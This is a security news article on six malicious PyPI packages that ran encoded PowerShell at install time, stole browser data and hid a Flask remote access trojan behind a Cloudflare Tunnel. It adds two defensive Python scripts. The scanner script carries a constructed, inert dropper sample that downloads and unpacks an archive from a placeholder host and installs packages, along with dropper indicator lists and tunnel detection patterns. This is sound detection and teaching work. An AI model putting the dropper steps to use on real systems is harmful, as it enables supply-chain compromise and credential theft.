PyPI malicious packages created Cloudflare Tunnels to bypass firewalls

The Python Package Index, or PyPI, continues to surprise, and not in a good way.

Meant to be a trusted source of Python libraries that developers can pull into their projects to save time, PyPI has again been caught hosting packages carrying live Amazon Web Services (AWS) keys and data-stealing malware. In the latest case, six malicious packages were found on PyPI that install data-stealing and remote access trojan (RAT) malware and use Cloudflare Tunnel to get past firewall restrictions and give the attackers remote access to the infected machine.

The six packages were found by the Phylum research team; the first of them appeared on the repository on December 22, 2022, and the last on December 31, 2022.

The six malicious packages Phylum detected, with their download counts at the time, are:

  • pyrologin – 165 downloads
  • easytimestamp – 141 downloads
  • discorder – 83 downloads
  • discord-dev – 228 downloads
  • py – 193 downloads
  • pythonstyles – 130 downloads

The packages run shell commands, log keystrokes, and steal sensitive user data stored in browsers.

All six packages have since been removed from PyPI, but removal from the index does not clean machines that already installed them: affected users must uninstall the packages manually, and because the malicious code runs at install time and leaves a RAT behind, the host should be treated as compromised rather than merely cleaned.

PowerShell Script in the Packages Allows Remote Control

The installer (setup.py) in each package contains a base64-encoded string that decodes to a PowerShell script, so the malicious code executes as soon as the package is installed with pip, without the developer ever importing it. The script runs with the -ErrorAction SilentlyContinue flag so that it keeps going without surfacing errors, which keeps the install looking normal to a developer watching the output.

The PowerShell script downloads a ZIP file, extracts it into a local temporary directory, and then installs a series of dependencies and extra Python packages that provide remote control and screenshot capture.

The packages flask and flask_cloudflared are installed silently at this stage as well. The malware can also steal cookies, saved passwords, and cryptocurrency wallet data from Google Chrome, Mozilla Firefox, Microsoft Edge, Brave, Opera, Opera GX, and Vivaldi.
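
As an added example, not code from the original article or from Phylum, the following static check looks for the pattern just described in a setup.py: a long base64 run that decodes to text containing PowerShell dropper indicators. It tries both UTF-8 (what a Python dropper typically encodes) and UTF-16LE (what PowerShell's -EncodedCommand expects), and requires two or more indicators before flagging, so a base64-encoded license text or icon does not trip it. The sample setup.py strings are constructed here, and the indicator list is an assumption drawn from the behaviour the article describes, not from the actual packages.

```python
"""Static scan of a setup.py for base64-encoded PowerShell.

Added example for this article (not Phylum's tooling). The sample setup.py
strings at the bottom are constructed for the demo.
"""
import base64
import re

# A run of 40+ base64 characters; genuine build scripts rarely contain one.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Tokens that, in combination, indicate a PowerShell dropper rather than a
# build step. Assumed from the behaviour described in the article.
PS_INDICATORS = (
    "-erroraction silentlycontinue",
    "invoke-webrequest",
    "expand-archive",
    "pip install",
    "flask_cloudflared",
    "cftunnel",
)
MIN_HITS = 2  # one token alone is too weak to flag on


def decode_candidate(blob):
    """Decode a base64 run to text, or return None if it is not text.

    A Python dropper usually base64-encodes UTF-8; PowerShell's
    -EncodedCommand expects UTF-16LE. UTF-16LE ASCII also decodes as UTF-8
    (with NUL bytes), so a printable-ratio check rejects that attempt and
    the UTF-16LE attempt then succeeds.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text)
        if text and printable / len(text) > 0.95:
            return text
    return None


def scan_setup_py(source):
    """Return one finding per base64 blob that decodes to PowerShell-like text."""
    findings = []
    for match in B64_RE.finditer(source):
        text = decode_candidate(match.group(0))
        if text is None:
            continue
        lowered = text.lower()
        hits = [tok for tok in PS_INDICATORS if tok in lowered]
        if len(hits) >= MIN_HITS:
            findings.append({
                "offset": match.start(),
                "indicators": hits,
                "preview": text[:60],
            })
    return findings


# --- constructed samples -------------------------------------------------

def make_setup_py(payload):
    """Build a setup.py-shaped string carrying one base64 blob (constructed)."""
    blob = base64.b64encode(payload).decode("ascii")
    return (
        "from setuptools import setup\n"
        f'_blob = "{blob}"\n'
        "setup(name='sample', version='0.1')\n"
    )

# Stand-in for the dropper script: the same steps the article describes,
# pointed at a non-routable example host so it is inert.
_DROPPER_PS = (
    "Invoke-WebRequest -Uri https://example.invalid/p.zip "
    "-OutFile $env:TEMP\\p.zip -ErrorAction SilentlyContinue\n"
    "Expand-Archive $env:TEMP\\p.zip -DestinationPath $env:TEMP\\p\n"
    "pip install flask flask_cloudflared\n"
)
SAMPLE_UTF8 = make_setup_py(_DROPPER_PS.encode("utf-8"))
SAMPLE_UTF16 = make_setup_py(_DROPPER_PS.encode("utf-16-le"))
# A base64 blob that is merely text (a license snippet) must not be flagged.
SAMPLE_BENIGN = make_setup_py(
    b"Permission is hereby granted, free of charge, to any person obtaining "
    b"a copy of this software and associated documentation files."
)

if __name__ == "__main__":
    for name, src in (("utf8", SAMPLE_UTF8), ("utf16", SAMPLE_UTF16), ("benign", SAMPLE_BENIGN)):
        print(name, scan_setup_py(src))
```

Run it over a downloaded sdist's setup.py before installing; a finding means the package is worth reading by hand, and an unreadable blob that still decodes cleanly is worth the same attention.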


Access Through Cloudflare Without Touching the Firewall

The script then runs cftunnel.py, also included in the ZIP archive, which installs a Cloudflare Tunnel client (cloudflared) on the victim's machine.

Cloudflare Tunnel is a service, available even on free accounts, that lets a host open a persistent outbound connection to Cloudflare's infrastructure; Cloudflare then proxies inbound requests for a public hostname back through that connection.

This lets a web server become publicly reachable through Cloudflare without configuring firewalls, opening inbound ports, or dealing with NAT and routing. The threat actors use the tunnel to reach the Flask-based remote access trojan running on the infected device even when a firewall blocks every inbound connection to it: the only traffic the firewall sees is an outbound session from the host to Cloudflare. Inbound filtering therefore does not help against this technique; what catches it is egress monitoring and watching for the cloudflared client on hosts that have no business running one.
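
To show what the tunnel looks like from the host side, here is an added triage example (not the researchers' tooling or the malware's code) that runs over constructed connection-table and DNS lines. It flags outbound sessions to port 7844, the port the cloudflared client uses to reach Cloudflare's edge; any process named cloudflared; DNS lookups under trycloudflare.com (the domain flask_cloudflared quick tunnels are published under, which is a property of that library rather than something the article states); and, once a tunnel is present, python listeners bound to loopback, since the tunnel is what makes those reachable from the internet. The record format and every line in the samples are constructed for the demo.

```python
"""Host-side triage for a Cloudflare tunnel fronting a local RAT.

Added example for this article (not the researchers' tooling). The record
format and every line in the samples are constructed for the demo.
"""
import re
from collections import namedtuple

Conn = namedtuple("Conn", "proto laddr lport raddr rport state pid exe")

# Constructed one-socket-per-line format:
#   proto laddr:lport -> raddr:rport STATE pid=N exe=NAME
LINE_RE = re.compile(
    r"(?P<proto>tcp|udp)\s+(?P<laddr>[\d.]+):(?P<lport>\d+)\s+->\s+"
    r"(?P<raddr>[\d.*]+):(?P<rport>\d+|\*)\s+(?P<state>\w+)\s+"
    r"pid=(?P<pid>\d+)\s+exe=(?P<exe>\S+)"
)

TUNNEL_PORT = 7844                          # cloudflared -> Cloudflare edge (QUIC or TCP)
QUICK_TUNNEL_DOMAIN = "trycloudflare.com"   # quick-tunnel hostnames (flask_cloudflared)


def parse_conn(line):
    """Parse one constructed socket record; None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    rport = None if d["rport"] == "*" else int(d["rport"])
    return Conn(d["proto"], d["laddr"], int(d["lport"]), d["raddr"], rport,
                d["state"].upper(), int(d["pid"]), d["exe"].lower())


def triage(conn_lines, dns_lines):
    """Return alert strings for tunnel indicators found in the given records."""
    alerts = []
    conns = [c for c in map(parse_conn, conn_lines) if c is not None]

    # Either signal is enough to call a process a tunnel client.
    tunnel_pids = {
        c.pid for c in conns
        if c.rport == TUNNEL_PORT or "cloudflared" in c.exe
    }
    for c in conns:
        if c.pid in tunnel_pids and c.rport is not None:
            alerts.append(f"outbound tunnel: pid {c.pid} ({c.exe}) -> {c.raddr}:{c.rport}")

    # A loopback-only listener is unreachable from outside on a firewalled host,
    # but once a tunnel runs on the same host it is one hostname away from the
    # internet. That is exactly the condition the Flask RAT relies on.
    if tunnel_pids:
        for c in conns:
            if c.state == "LISTEN" and c.laddr.startswith("127.") and c.exe.startswith("python"):
                alerts.append(
                    f"loopback listener exposed via tunnel: pid {c.pid} ({c.exe}) "
                    f"on {c.laddr}:{c.lport}"
                )

    for line in dns_lines:
        if QUICK_TUNNEL_DOMAIN in line.lower():
            alerts.append(f"quick-tunnel hostname resolved: {line.strip()}")
    return alerts


# --- constructed samples -------------------------------------------------
SAMPLE_CONNS = [
    "tcp 127.0.0.1:5000 -> *:* LISTEN pid=3988 exe=python.exe",   # Flask RAT, loopback only
    "tcp 10.0.0.5:51234 -> 203.0.113.10:7844 ESTABLISHED pid=4120 exe=cloudflared.exe",
    "tcp 10.0.0.5:51240 -> 203.0.113.20:443 ESTABLISHED pid=2210 exe=chrome.exe",
    "tcp 0.0.0.0:3389 -> *:* LISTEN pid=900 exe=svchost.exe",
]
SAMPLE_DNS = [
    "2022-12-28T10:02:11Z pid=4120 query A quiet-river-maple-stone.trycloudflare.com",
    "2022-12-28T10:02:12Z pid=2210 query A www.example.com",
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_CONNS, SAMPLE_DNS):
        print(alert)
```

cloudflared has plenty of legitimate uses, so these alerts are a starting point for triage rather than a verdict; the combination that matters in this campaign is a tunnel client whose parent chain leads back to pip or python, sitting next to a loopback-only Flask listener.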


Remediation
The following remediation steps are recommended:

  • Check installed packages and dependency files against threat feeds, and remove any identified malicious package from both the hosts and the source tree. Because setup.py runs at install time, uninstalling the package does not undo what the dropper already did, so treat an affected host as compromised.
  • Deploy endpoint detection and response tooling within the organization that can flag pip or python spawning PowerShell, unexpected cloudflared processes, and new outbound tunnel traffic.
  • Rotate the credentials this malware targets, namely browser-saved passwords, session cookies, and cryptocurrency wallet keys, and enforce a strict password policy when doing so.
  • Vet open source dependencies before adopting them (inspect setup.py for encoded or network-fetching code, check package age, maintainer, and download history) and keep reviewing them as part of source code review, to prevent further attacks of this kind.
  • Implement security event logging and monitoring, and manage it properly, so that install-time execution and new outbound connections from developer machines are visible.